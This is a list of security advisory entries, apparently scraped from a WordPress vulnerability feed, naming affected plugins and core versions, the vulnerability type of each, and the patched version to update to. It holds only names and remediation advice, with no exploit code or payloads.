Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.8.7
Recommended Action: Update to version 4.8.7, or a newer patched version

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Cross-Site Scripting
Patched Version: 5.4
Recommended Action: Update to version 5.4, or a newer patched version

Plugin: Usernoise modal feedback / contact form

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.9
Recommended Action: Update to version 3.7.9, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Authenticated (Administrator+) SQL Injection via *_selected
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: reSmush.it : The original free image compressor and optimizer plugin

Vulnerability: Missing Authorization
Patched Version: 0.4.4
Recommended Action: Update to version 0.4.4, or a newer patched version

Plugin: Gallery Categories by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Essential Real Estate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Hotjar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: WCFM Membership – WooCommerce Memberships for Multivendor Marketplace

Vulnerability: Missing Authorization
Patched Version: 2.10.1
Recommended Action: Update to version 2.10.1, or a newer patched version

Plugin: Author Chat

Vulnerability: SQL Injection
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WPS Hide Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.9.8
Recommended Action: Update to version 2.9.8, or a newer patched version

Plugin: افزونه پیامک ووکامرس Persian WooCommerce SMS

Vulnerability: Cross-Site Scripting and SQL Injection
Patched Version: 4.4.1
Recommended Action: Update to version 4.4.1, or a newer patched version

Plugin: Quotes Collection

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WordPress Exit Box Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: wpDiscuz <= 3.1.4
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: All-in-One WP Migration and Backup

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.46
Recommended Action: Update to version 6.46, or a newer patched version

Plugin: Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: WPGraphQL

Vulnerability: Information Exposure
Patched Version: 0.3.0
Recommended Action: Update to version 0.3.0, or a newer patched version

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Sensitive Data Disclosure
Patched Version: 5.0.7
Recommended Action: Update to version 5.0.7, or a newer patched version

Plugin: WP Reactions Lite

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Booked – Appointment Booking for WordPress

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.25.0
Recommended Action: Update to version 1.25.0, or a newer patched version

Plugin: Incoming Links

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.9.10b
Recommended Action: Update to version 0.9.10b, or a newer patched version

Plugin: Advanced Flamingo

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Source Control

Vulnerability: Directory Traversal
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: quick-post-widget

Vulnerability: Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jock On Air Now

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.6.3
Recommended Action: Update to version 5.6.3, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Missing Authorization
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Cross-Site Scripting
Patched Version: 2.74
Recommended Action: Update to version 2.74, or a newer patched version

Plugin: WangGuard

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Mail Subscribe List

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Insecure Direct Object Reference to Post Rating Increase/Decrease
Patched Version: 7.6.4
Recommended Action: Update to version 7.6.4, or a newer patched version

Plugin: WP Activity Log

Vulnerability: Missing Authorization
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: CPO Content Types

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BP Profile Search

Vulnerability: PHP Object Injection
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps)

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Youtube SpeedLoad

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 8.4
Recommended Action: Update to version 8.4, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘saveSitemapSettings’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Change WordPress Login Logo

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Advanced Ads – Ad Manager & AdSense

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.32.0
Recommended Action: Update to version 1.32.0, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Path Traversal to Sensitive Information Disclosure
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: PDF & Print by BestWebSoft – WordPress Posts and Pages PDF Generator Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.4
Recommended Action: Update to version 1.9.4, or a newer patched version

Plugin: 微信机器人高级版

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: School Management System for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 57.0
Recommended Action: Update to version 57.0, or a newer patched version

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.18
Recommended Action: Update to version 3.4.18, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.10.2
Recommended Action: Update to version 4.10.2, or a newer patched version

Plugin: Captchinoo, admin login page protection with Google recaptcha

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Paytium: Mollie payment forms & donations

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.3.7
Recommended Action: Update to version 4.3.7, or a newer patched version

Plugin: Fonts Plugin | Use Google Fonts, Adobe Fonts or Upload Fonts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via blockType arguments
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Unlimited Elements For Elementor (Free Widgets, Addons, Templates)

Vulnerability: Missing Authorization
Patched Version: 1.5.66
Recommended Action: Update to version 1.5.66, or a newer patched version

Plugin: Backup and Staging by WP Time Capsule

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.22.7
Recommended Action: Update to version 1.22.7, or a newer patched version

Plugin: LearnDash LMS

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: GSEOR – WordPress SEO Plugin

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Assistant – Every Day Productivity Apps

Vulnerability: Authenticated (Editor+) Server Side Request Forgery
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: Payment Bypass
Patched Version: 3.9.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.9.4, 4.0.3, 4.1.1, 4.2.2, 4.3.1, 4.4.1, 4.5.1

Plugin: Device Theme Switcher

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Qtranslate Slug

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.15.4
Recommended Action: Update to version 1.15.4, or a newer patched version

Plugin: W4 Post List

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Seraphinite Accelerator

Vulnerability: Arbitrary Redirect via ‘redir’
Patched Version: 2.20.29
Recommended Action: Update to version 2.20.29, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.44
Recommended Action: Update to version 3.2.44, or a newer patched version

Plugin: Survey Maker

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Web Accessibility By accessiBe

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: wp-appointment-schedule-booking-system

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Whois Domain

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Restaurant Menu – Food Ordering System – Table Reservation

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: FireCask Like & Share Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: NewStatPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Qi Addons For Elementor

Vulnerability: Authenticated (Contributor+) Local File Inclusion
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Restaurant & Cafe Addon for Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 11.2.3
Recommended Action: Update to version 11.2.3, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: No subtitle
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Scripting via rules[0][content] parameter
Patched Version: 0.8.8.6
Recommended Action: Update to version 0.8.8.6, or a newer patched version

Plugin: Column-Matic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Seraphinite Accelerator

Vulnerability: Reflected Cross-Site Scripting via ‘rt’
Patched Version: 2.20.29
Recommended Action: Update to version 2.20.29, or a newer patched version

Plugin: GeneratePress Premium

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Custom Meta
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Unauthenticated SQL Injection
Patched Version: 7.6.6
Recommended Action: Update to version 7.6.6, or a newer patched version

Plugin: your-text-manager

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Plugin Central

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.9
Recommended Action: Update to version 7.9, or a newer patched version

Core: WordPress

Vulnerability: XXE Injection
Patched Version: 4.7.20
Recommended Action: Update to one of the following versions, or a newer patched version: 4.7.20, 4.8.16, 4.9.17, 5.0.12, 5.1.9, 5.2.10, 5.3.7, 5.4.5, 5.5.4, 5.6.3, 5.7.1

Plugin: illi Link Party!

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Zippy

Vulnerability: Authenticated (Author+) PHP Object Injection via unzipPosts
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.6
Recommended Action: Update to version 4.5.6, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Authenticated (Author+) Arbitrary File Manipulation
Patched Version: 10.0.1
Recommended Action: Update to one of the following versions, or a newer patched version: 10.0.1, 10.1.1, 10.2.2, 10.3.1, 10.4.1, 10.5.2, 10.6.2, 10.7.1, 10.8.1, 10.9.2, 11.0.1, 11.1.3, 11.2.1, 11.3.3, 11.4.1, 11.5.2, 11.6.1, 11.7.2, 11.8.5, 11.9.2, 12.0.1, 12.1.1, 2.0.9, 2.1.7, 2.2.10, 2.3.10, 2.4.7, 2.5.5, 2.6.6, 2.7.5, 2.8.5, 2.9.6, 3.0.6, 3.1.5, 3.2.5, 3.3.6, 3.4.6, 3.5.6, 3.6.4, 3.7.5, 3.8.5, 3.9.9, 4.0.6, 4.1.3, 4.2.4, 4.3.4, 4.4.4, 4.5.2, 4.6.2, 4.7.3, 4.8.4, 4.9.2, 5.0.2, 5.1.3, 5.2.4, 5.3.3, 5.4.3, 5.5.4, 5.6.4, 5.7.4, 5.8.3, 5.9.3, 6.0.3, 6.1.4, 6.2.4, 6.3.6, 6.4.5, 6.5.3, 6.6.4, 6.7.3, 6.8.4, 6.9.3, 7.0.4, 7.1.4, 7.2.4, 7.3.4, 7.4.4, 7.5.6, 7.6.3, 7.7.5, 7.8.3, 7.9.3, 8.0.2, 8.1.3, 8.2.5, 8.3.2, 8.4.4, 8.5.2, 8.6.3, 8.7.3, 8.8.4, 8.9.3, 9.0.4, 9.1.2, 9.2.3, 9.3.4, 9.4.3, 9.5.4, 9.6.3, 9.7.2, 9.8.2, 9.9.2

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Custom Body Class

Vulnerability: Cross-Site Scripting
Patched Version: 0.7.0
Recommended Action: Update to version 0.7.0, or a newer patched version

Plugin: Easing Slider

Vulnerability: Missing Authorization to Unauthenticated Settings Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Video XML Sitemap Generator

Vulnerability: Cross-Site Request Forgery via video_sitemap_generate
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Cross-Site Request Forgery to Arbitrary Ticket Deletion
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Arbitrary File Modification
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: Responsive Plus – Starter Templates, Advanced Features and Customizer Settings for Responsive Theme.

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.6.9
Recommended Action: Update to version 2.6.9, or a newer patched version

Plugin: Contact Form by BestWebSoft – Advanced Contact Us Form Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.96
Recommended Action: Update to version 3.96, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: CSV Injection
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Contact Form & SMTP Plugin for WordPress by PirateForms

Vulnerability: Unauthenticated HTML Injection
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Woocommerce Custom Checkout Fields Editor With Drag & Drop

Vulnerability: Reflected Cross-Site Scripting via ‘tab’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Username Updater

Vulnerability: Cross-Site Request Forgery to Username Change
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Hot Linked Image Cacher

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Post Indexer

Vulnerability: PHP Object Injection
Patched Version: 3.0.6.2
Recommended Action: Update to version 3.0.6.2, or a newer patched version

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.7.6
Recommended Action: Update to version 3.7.6, or a newer patched version

Plugin: ZM Gallery

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Use Any Font | Custom Font Uploader

Vulnerability: Cross-Site Request Forgery to API Key Deactivation
Patched Version: 6.1.8
Recommended Action: Update to version 6.1.8, or a newer patched version

Plugin: New User Approve

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: CSV Injection
Patched Version: 4.3.13
Recommended Action: Update to version 4.3.13, or a newer patched version

Plugin: InfiniteWP Client

Vulnerability: Privilege Escalation
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Export Users With Meta

Vulnerability: CSV Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redirection for Contact Form 7

Vulnerability: Unprotected AJAX Actions
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.20.96
Recommended Action: Update to version 4.20.96, or a newer patched version

Plugin: SVG Support

Vulnerability: No subtitle
Patched Version: 2.3.20
Recommended Action: Update to version 2.3.20, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Missing Authorization
Patched Version: 0.9.97.20
Recommended Action: Update to version 0.9.97.20, or a newer patched version

Plugin: swipehq-payment-gateway-woocommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kadence WooCommerce Email Designer

Vulnerability: PHP Object Injection
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: MailerLite – WooCommerce integration

Vulnerability: Cross-Site Request Forgery via Multiple AJAX Functions
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Analytics Tracker

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Coming Soon Page – Responsive Coming Soon & Maintenance Mode

Vulnerability: Cross-Site Scripting via counter_title parameter
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Simple File List

Vulnerability: Remote Code Execution
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Bold Timeline Lite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Woocommerce Tip/Donation

Vulnerability: Authenticated (Shop manager+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Indeed Membership Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.7
Recommended Action: Update to version 8.7, or a newer patched version

Plugin: s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions

Vulnerability: Cross-Site Scripting
Patched Version: 111220
Recommended Action: Update to version 111220, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Missing Authorization to Settings Update
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: JoomSport – for Sports: Team & League, Football, Hockey & more

Vulnerability: Authenticated (Admin+) SQL Injection via orderby
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: WP Spell Check

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.18
Recommended Action: Update to version 9.18, or a newer patched version

Plugin: WP Links Page

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.9.2
Recommended Action: Update to version 4.9.2, or a newer patched version

Plugin: Elementor Website Builder Pro

Vulnerability: Authenticated Remote Code Execution in Dynamic OOO Widget
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Easy2Map Photos

Vulnerability: Path Traversal
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: Exifography

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Insert Pages

Vulnerability: Authenticated Directory Traversal
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Word Search Puzzles game

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Missing Authorization via template_count
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Authenticated (Author+) PHAR Deserialization
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: Sunny Search

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ShortPixel Image Optimizer – Optimize Images, Convert WebP & AVIF

Vulnerability: Authenticated (Editor+) PHP Object Injection
Patched Version: 5.4.2
Recommended Action: Update to version 5.4.2, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: SQL Injection
Patched Version: 7.3.15.727
Recommended Action: Update to version 7.3.15.727, or a newer patched version

Plugin: Property Hive

Vulnerability: Reflected Cross-Site Scripting via ‘merge_ids’
Patched Version: 1.5.47
Recommended Action: Update to version 1.5.47, or a newer patched version

Plugin: CMS Tree Page View

Vulnerability: Cross-Site Scripting
Patched Version: 0.8.9
Recommended Action: Update to version 0.8.9, or a newer patched version

Plugin: Enable SVG, WebP, and ICO Upload

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Tabs – Responsive Tabs with WooCommerce Product Tab Extension

Vulnerability: Authenticated (Admin+) Arbitrary Options Update
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Add Any Extension to Pages

Vulnerability: Cross-Site Request Forgery via aaetp_options_page
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Booking Calendar Contact Form

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.41
Recommended Action: Update to version 1.2.41, or a newer patched version

Plugin: Send PDF for Contact Form 7

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.9.9.2
Recommended Action: Update to version 0.9.9.2, or a newer patched version

Plugin: Better Anchor Links

Vulnerability: Cross-Site Request Forgery via admin/options.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 7.2.3
Recommended Action: Update to version 7.2.3, or a newer patched version

Plugin: Image Optimizer by 10web – Image Optimizer and Compression plugin

Vulnerability: Authenticated (Administrator+) Directory Traversal
Patched Version: 1.0.27
Recommended Action: Update to version 1.0.27, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Improper Input Validation
Patched Version: 8.0.5
Recommended Action: Update to version 8.0.5, or a newer patched version

Plugin: ImageLinks Interactive Image Builder for WordPress

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Social Slider Feed

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Theme and plugin translation for Polylang (TTfP)

Vulnerability: Missing Authorization
Patched Version: 3.2.17
Recommended Action: Update to version 3.2.17, or a newer patched version

Core: WordPress

Vulnerability: Server Side Request Forgery
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Relevanssi – A Better Search (Pro)

Vulnerability: Missing Authorization to Unauthorized Post Access
Patched Version: 2.25.0
Recommended Action: Update to version 2.25.0, or a newer patched version

Plugin: Popup | Custom Popup Builder

Vulnerability: Denial of Service
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 2.0.10
